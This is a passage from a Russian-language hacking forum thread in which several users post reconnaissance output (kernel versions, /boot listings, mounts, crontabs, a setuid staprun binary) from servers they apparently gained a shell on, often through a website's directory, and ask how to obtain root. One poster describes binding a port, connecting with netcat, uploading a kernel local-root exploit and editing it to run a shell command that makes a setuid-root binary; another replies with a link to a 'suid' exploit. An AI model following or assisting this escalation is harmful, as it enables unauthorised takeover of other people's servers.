    
    под неё нашёл такой вот сплоит, по моему мнению он должен сработать, или я ошибаюсь?

    http://1337day.com/exploit/17189

    * Linux 2.6.18-128.el5
    * Linux 2.6.9-89.EL
    * Ubuntu 8.10 Linux 2.6.27
    *
    * For i386 & ppc compile with the command;
    * gcc -w -o exploit exploit.c
    *
    * For x86_64 kernel and ppc64 Compile as;
    * gcc -w -m64 -o exploit exploit.c

    забиндил порт на системе получил коммандную строку

    приконнектился через неткат

    залил сплоит как make.sh
    запускаем ./make.sh
    permission denied :(
    пробую из темпа
    ./make.sh
    permission denied
    дальше меняю
    Code:
    execl("/bin/sh", "sh", NULL);
    на это
    Code:
    execl("/bin/sh","/bin/sh", "-c", "cp ./suidnik ./s; chown root ./s; chgrp root ./s; chmod 777 ./s; chmod +s ./s;", NULL);
    пробовал скомпилить как в инструкции к сплоиту
    gcc -w -o exploit exploit.c
    после компиляции пробую запустить сплоит опять пермишн денайд ((((
    пробую так gcc make.sh
    дальше ./a.out
    опять пермишн денайд ((((
    подскажите плиз что не так делаю? и как обойти permission denied?
    всё компилилось без ошибок всё ок... :( спасибо огромное за помощь и потраченное время...

    сильно не бить если нельзя запускать через sh сплоит, а надо обязательно компилить, честно презнаюсь первый раз с этим сталкиваюсь и возникает такая необходимость...
     
  13. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Прошу помощи весь гугл перерыл...
    Code:
    uname -a
    FreeBSD cp65.agava.net 7.4-RELEASE-p3 FreeBSD 7.4-RELEASE-p3 #5: Wed Sep 28 22:16:19 UTC 2011  [email protected]:/opt/usr/obj/opt/usr/src/sys/XEON  i386
    
    ls -la --full-time /lib/lib*
    total 2580
    drwxr-xr-x   7 root  wheel    1024 Dec  6  2011 .
    drwxr-xr-x  20 root  wheel     512 Jul  1 19:30 ..
    -r--r--r--   1 root  wheel    7689 May 26  2011 beastie.4th
    -r--r--r--   1 root  wheel    8192 May 26  2011 boot
    -r--r--r--   1 root  wheel     512 May 26  2011 boot0
    -r--r--r--   1 root  wheel     512 May 26  2011 boot0sio
    -r--r--r--   1 root  wheel     512 May 26  2011 boot1
    -r--r--r--   1 root  wheel    7680 May 26  2011 boot2
    -r--r--r--   1 root  wheel    1201 May 26  2011 cdboot
    drwxr-xr-x   2 root  wheel     512 May 26  2011 defaults
    -r--r--r--   1 root  wheel    1746 Aug 23  2011 device.hints
    drwxr-xr-x   2 root  wheel     512 May 26  2011 firmware
    -r--r--r--   1 root  wheel    2258 May 26  2011 frames.4th
    -r--r--r--   1 root  wheel    7567 May 26  2011 gptboot
    -r--r--r--   1 root  wheel   26279 May 26  2011 gptzfsboot
    drwxr-xr-x   2 root  wheel     512 Nov  6  2006 kernel
    -r-xr-xr-x   1 root  wheel  262144 May 26  2011 loader
    -r--r--r--   1 root  wheel    5865 May 26  2011 loader.4th
    -r--r--r--   1 root  wheel   15219 May 26  2011 loader.help
    -r-xr-xr-x   1 root  wheel  217088 Aug  3  2009 loader.old
    -r--r--r--   1 root  wheel     389 Nov  6  2006 loader.rc
    -r--r--r--   1 root  wheel     512 May 26  2011 mbr
    drwxr-xr-x   2 root  wheel     512 Nov  6  2006 modules
    -r--r--r--   1 root  wheel     512 May 26  2011 pmbr
    -r--r--r--   1 root  wheel  264192 May 26  2011 pxeboot
    -r--r--r--   1 root  wheel     699 May 26  2011 screen.4th
    -r--r--r--   1 root  wheel   35136 May 26  2011 support.4th
    drwxr-xr-x   2 root  wheel     512 May 26  2011 zfs
    -r--r--r--   1 root  wheel   33280 May 26  2011 zfsboot
    -r-xr-xr-x   1 root  wheel  282624 May 26  2011 zfsloader
    
    df -h
    Filesystem       Size    Used   Avail Capacity  Mounted on
    /dev/amrd0s1a    496M    151M    305M    33%    /
    devfs            1.0K    1.0K      0B   100%    /dev
    /dev/amrd0s1f    125G     89G     26G    78%    /opt
    /dev/amrd0s1e    989M    668M    242M    73%    /usr
    /dev/amrd0s1d    989M    634M    276M    70%    /var
    procfs           4.0K    4.0K      0B   100%    /proc
    procfs           4.0K    4.0K      0B   100%    /opt/jails/cp/proc
    devfs            1.0K    1.0K      0B   100%    /opt/jails/cp/dev
    
    cat /etc/crontab
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    #
    #minute hour    mday    month   wday    who     command
    #
    */5     *       *       *       *       root    /usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    */11    *       *       *       *       operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    0       *       *       *       *       root    newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    1       3       *       *       *       root    periodic daily
    15      4       *       *       6       root    periodic weekly
    30      5       1       *       *       root    periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    1,31    0-5     *       *       *       root    adjkerntz -a
    
    
    Надеюсь на вашу помощь :)
     
  14. dumpersteam

    dumpersteam New Member

    Joined:
    9 Sep 2013
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    Доброго всем дня, помогите найти как зарутать
    $ uname -a

    PHP:
    Linux 3.2.0-49-generic #75-Ubuntu SMP Tue Jun 18 17:39:32 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot

    PHP:
    total 115252
    drwxr
    -xr-x  4 root root     3072 Apr 11 21:56 .
    drwxr-xr-x 23 root root     4096 Apr 11 21:55 ..
    -
    rw-r--r--  1 root root   792767 Jan 24  2013 abi-3.2.0-37-generic
    -rw-r--r--  1 root root   792830 Feb 27  2013 abi-3.2.0-39-generic
    -rw-r--r--  1 root root   795365 Jun 18  2013 abi-3.2.0-49-generic
    -rw-r--r--  1 root root   795365 Jul 26  2013 abi-3.2.0-52-generic
    -rw-r--r--  1 root root   795743 Feb 18 23:33 abi-3.2.0-60-generic
    -rw-r--r--  1 root root   140505 Jan 24  2013 config-3.2.0-37-generic
    -rw-r--r--  1 root root   140488 Feb 27  2013 config-3.2.0-39-generic
    -rw-r--r--  1 root root   140622 Jun 18  2013 config-3.2.0-49-generic
    -rw-r--r--  1 root root   140629 Jul 26  2013 config-3.2.0-52-generic
    -rw-r--r--  1 root root   140612 Feb 18 23:33 config-3.2.0-60-generic
    drwxr
    -xr-x  3 root root     7168 Apr 11 21:56 grub
    -rw-r--r--  1 root root 14610377 Feb 18  2013 initrd.img-3.2.0-37-generic
    -rw-r--r--  1 root root 14591334 Mar 28  2013 initrd.img-3.2.0-39-generic
    -rw-r--r--  1 root root 14639798 Sep  3  2013 initrd.img-3.2.0-49-generic
    -rw-r--r--  1 root root 14639112 Apr 11 21:50 initrd.img-3.2.0-52-generic
    -rw-r--r--  1 root root 14647977 Apr 11 21:56 initrd.img-3.2.0-60-generic
    drwx
    ------  2 root root    12288 Feb 18  2013 lost+found
    -rw-r--r--  1 root root   176764 Nov 27  2011 memtest86+.bin
    -rw-r--r--  1 root root   178944 Nov 27  2011 memtest86+_multiboot.bin
    -rw-------  1 root root  2886103 Jan 24  2013 System.map-3.2.0-37-generic
    -rw-------  1 root root  2888361 Feb 27  2013 System.map-3.2.0-39-generic
    -rw-------  1 root root  2893287 Jun 18  2013 System.map-3.2.0-49-generic
    -rw-------  1 root root  2893555 Jul 26  2013 System.map-3.2.0-52-generic
    -rw-------  1 root root  2895229 Feb 18 23:33 System.map-3.2.0-60-generic
    -rw-------  1 root root  4969072 Jan 24  2013 vmlinuz-3.2.0-37-generic
    -rw-------  1 root root  4971472 Feb 27  2013 vmlinuz-3.2.0-39-generic
    -rw-------  1 root root  4978416 Jun 18  2013 vmlinuz-3.2.0-49-generic
    -rw-------  1 root root  4978224 Jul 26  2013 vmlinuz-3.2.0-52-generic
    -rw-------  1 root root  4981616 Feb 18 23:33 vmlinuz-3.2.0-60-generic

    $ mount
    PHP:
    /dev/md3 on type ext3 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    /
    dev/md2 on /tmp type ext3 (rw)
    /
    dev/md0 on /boot type ext3 (rw)
     
    #534 dumpersteam, 16 Aug 2014
    Last edited: 21 Oct 2014
  15. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Code:
    $ uname -a
     Linux xxxxxxx.be 2.6.34.6-xxxx-grs-ipv6-64 #3 SMP Fri Sep 17 16:06:38 UTC 2010 x86_64 Intel(R) Xeon(R) CPU X3360 @ 2.83GHz GenuineIntel GNU/Linux Кто чем поможет? спасибо
    
     
    #535 vasykas, 11 Sep 2014
    Last edited: 12 Sep 2014
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Оформите пост согласно требованиям или выложите результат работы скрипта от b3
     
  17. beginner2010

    beginner2010 Elder - Старейшина

    Joined:
    21 Nov 2010
    Messages:
    558
    Likes Received:
    348
    Reputations:
    151
    возможно ли поднять права? заранее спасибо

    $ uname -a
    Code:
    FreeBSD *** 9.2-RELEASE FreeBSD 9.2-RELEASE #0: Wed Dec 11 16:09:05 CET 2013     ***:/usr/obj/usr/src/sys/XENHVM  amd64
    $ ls -la /boot
    Code:
    total 2832
    drwxr-xr-x   8 root  wheel    1024 Dec 11  2013 .
    drwxr-xr-x  20 root  wheel    8704 Sep 16 01:00 ..
    -r--r--r--   1 root  wheel   12264 Sep 27  2013 beastie.4th
    -r--r--r--   1 root  wheel    8192 Sep 27  2013 boot
    -r--r--r--   1 root  wheel     512 Sep 27  2013 boot0
    -r--r--r--   1 root  wheel     512 Sep 27  2013 boot0sio
    -r--r--r--   1 root  wheel     512 Sep 27  2013 boot1
    -r--r--r--   1 root  wheel    7680 Sep 27  2013 boot2
    -r--r--r--   1 root  wheel    2940 Sep 27  2013 brand.4th
    -r--r--r--   1 root  wheel    1185 Sep 27  2013 cdboot
    -r--r--r--   1 root  wheel    5667 Sep 27  2013 check-password.4th
    -r--r--r--   1 root  wheel    1872 Sep 27  2013 color.4th
    drwxr-xr-x   2 root  wheel     512 Sep 27  2013 defaults
    -r--r--r--   1 root  wheel    3917 Sep 27  2013 delay.4th
    -r--r--r--   1 root  wheel     791 Sep 27  2013 device.hints
    drwxr-xr-x   2 root  wheel     512 Sep 27  2013 firmware
    -r--r--r--   1 root  wheel    2623 Sep 27  2013 frames.4th
    -r--r--r--   1 root  wheel   15443 Sep 27  2013 gptboot
    -r--r--r--   1 root  wheel   41923 Sep 27  2013 gptzfsboot
    drwxr-xr-x   2 root  wheel   33280 Dec 11  2013 kernel
    drwxr-xr-x   2 root  wheel   33280 Dec 11  2013 kernel.old
    -r-xr-xr-x   1 root  wheel  229376 Sep 27  2013 loader
    -r--r--r--   1 root  wheel    5884 Sep 27  2013 loader.4th
    -r--r--r--   1 root  wheel   14766 Sep 27  2013 loader.help
    -r--r--r--   1 root  wheel     393 Sep 27  2013 loader.rc
    -r--r--r--   1 root  wheel     512 Sep 27  2013 mbr
    -r--r--r--   1 root  wheel    7000 Sep 27  2013 menu-commands.4th
    -r--r--r--   1 root  wheel   30264 Sep 27  2013 menu.4th
    -r--r--r--   1 root  wheel    4167 Sep 27  2013 menu.rc
    -r--r--r--   1 root  wheel   18231 Sep 27  2013 menusets.4th
    drwxr-xr-x   2 root  wheel     512 Sep 27  2013 modules
    -r--r--r--   1 root  wheel     512 Sep 27  2013 pmbr
    -r--r--r--   1 root  wheel  231424 Sep 27  2013 pxeboot
    -r--r--r--   1 root  wheel     700 Sep 27  2013 screen.4th
    -r--r--r--   1 root  wheel    2618 Sep 27  2013 shortcuts.4th
    -r--r--r--   1 root  wheel   35601 Sep 27  2013 support.4th
    -r--r--r--   1 root  wheel  250284 Sep 27  2013 userboot.so
    -r--r--r--   1 root  wheel    2883 Sep 27  2013 version.4th
    drwxr-xr-x   2 root  wheel     512 Sep 27  2013 zfs
    -r--r--r--   1 root  wheel   66048 Sep 27  2013 zfsboot
    -r-xr-xr-x   1 root  wheel  266240 Sep 27  2013 zfsloader

    $ mount
    Code:
    /dev/ada0s1a on / (ufs, local, journaled soft-updates)
    devfs on /dev (devfs, local, multilabel)
    /dev/ada0s1d on /expert (ufs, local, journaled soft-updates)
    $ df -h
    Code:
    Filesystem      Size    Used   Avail Capacity  Mounted on
    /dev/ada0s1a     24G    6.9G     15G    31%    /
    devfs           1.0k    1.0k      0B   100%    /dev
    /dev/ada0s1d    165G    107G     45G    70%    /expert
    $ cat /etc/crontab
    Code:
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD: release/9.2.0/etc/crontab 194170 2009-06-14 06:37:19Z brian $
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    #
    #minute	hour	mday	month	wday	who	command
    #
    */5	*	*	*	*	root	/usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    */11	*	*	*	*	operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    0	*	*	*	*	root	newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    1	3	*	*	*	root	periodic daily
    15	4	*	*	6	root	periodic weekly
    30	5	1	*	*	root	periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    1,31	0-5	*	*	*	root	adjkerntz -a
    $ pwd
    Code:
    /etc
     
  18. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Чем чреват доступ к php.ini. Можно ли с помощью него повысить права?
     
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    beginner2010

    Пробуйте это, версия для суидника:
    http://pastebin.com/mvrVAtJw
     
    1 person likes this.
  20. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    $ uname -a

    linux mail.xxxxxxx.xx 2.6.32-279.11.1.el6.x86_64 #1 SMP Tue Oct 16 11:16:02 CDT 2012 x86_64 x86_64 x86_64 GNU/Linux

    $ mount
    /dev/mapper/vg_noc-LogVol00 on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda1 on /boot type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
    nfsd on /proc/fs/nfsd type nfsd (rw)
    /etc/named on /var/named/chroot/etc/named type none (rw,bind)
    /var/named on /var/named/chroot/var/named type none (rw,bind)
    /etc/rndc.conf on /var/named/chroot/etc/rndc.conf type none (rw,bind)
    /usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind)
    /etc/named.iscdlv.key on /var/named/chroot/etc/named.iscdlv.key type none (rw,bind)
    /etc/named.root.key on /var/named/chroot/etc/named.root.key type none (rw,bind)


    $ cat /proc/version
    Linux version 2.6.32-279.11.1.el6.x86_64 ([email protected]) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Tue Oct 16 11:16:02 CDT 2012

    $ ls -la /boot
    total 61696
    dr-xr-xr-x. 5 root root 4096 Oct 18 2012 .
    dr-xr-xr-x. 24 root root 4096 May 15 10:14 ..
    -rw-r--r-- 1 root root 170 Mar 7 2012 .vmlinuz-2.6.32-220.7.1.el6.x86_64.hmac
    -rw-r--r-- 1 root root 171 Oct 16 2012 .vmlinuz-2.6.32-279.11.1.el6.x86_64.hmac
    -rw-r--r-- 1 root root 170 Aug 15 2012 .vmlinuz-2.6.32-279.5.1.el6.x86_64.hmac
    -rw-r--r-- 1 root root 2313972 Mar 7 2012 System.map-2.6.32-220.7.1.el6.x86_64
    -rw-r--r-- 1 root root 2342243 Oct 16 2012 System.map-2.6.32-279.11.1.el6.x86_64
    -rw-r--r-- 1 root root 2341894 Aug 15 2012 System.map-2.6.32-279.5.1.el6.x86_64
    -rw-r--r-- 1 root root 100947 Mar 7 2012 config-2.6.32-220.7.1.el6.x86_64
    -rw-r--r-- 1 root root 101977 Oct 16 2012 config-2.6.32-279.11.1.el6.x86_64
    -rw-r--r-- 1 root root 101976 Aug 15 2012 config-2.6.32-279.5.1.el6.x86_64
    drwxr-xr-x. 3 root root 4096 Nov 11 2011 efi
    drwxr-xr-x. 2 root root 4096 Oct 18 2012 grub
    -rw-r--r-- 1 root root 13966167 Mar 12 2012 initramfs-2.6.32-220.7.1.el6.x86_64.img
    -rw-r--r-- 1 root root 15189592 Oct 18 2012 initramfs-2.6.32-279.11.1.el6.x86_64.img
    -rw-r--r-- 1 root root 14207596 Sep 14 2012 initramfs-2.6.32-279.5.1.el6.x86_64.img
    drwx------. 2 root root 16384 Nov 11 2011 lost+found
    -rw-r--r-- 1 root root 171216 Mar 7 2012 symvers-2.6.32-220.7.1.el6.x86_64.gz
    -rw-r--r-- 1 root root 179202 Oct 16 2012 symvers-2.6.32-279.11.1.el6.x86_64.gz
    -rw-r--r-- 1 root root 179204 Aug 15 2012 symvers-2.6.32-279.5.1.el6.x86_64.gz
    -rwxr-xr-x 1 root root 3941456 Mar 7 2012 vmlinuz-2.6.32-220.7.1.el6.x86_64
    -rwxr-xr-x 1 root root 3988240 Oct 16 2012 vmlinuz-2.6.32-279.11.1.el6.x86_64
    -rwxr-xr-x 1 root root 3987376 Aug 15 2012 vmlinuz-2.6.32-279.5.1.el6.x86_64

    $ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/mapper/vg_noc-LogVol00
    729G 647G 45G 94% /
    tmpfs 2.9G 0 2.9G 0% /dev/shm
    /dev/sda1 1012M 95M 866M 10% /boot

    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    $ cat /proc/sys/vm/mmap_min_addr
    4096

    $ pwd
    /var/www/data/xxxxxx.ru/tmp/

    $ ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 158488 Jun 20 2012 /usr/bin/staprun
     
    #540 PoliGroS, 11 Oct 2014
    Last edited: 11 Oct 2014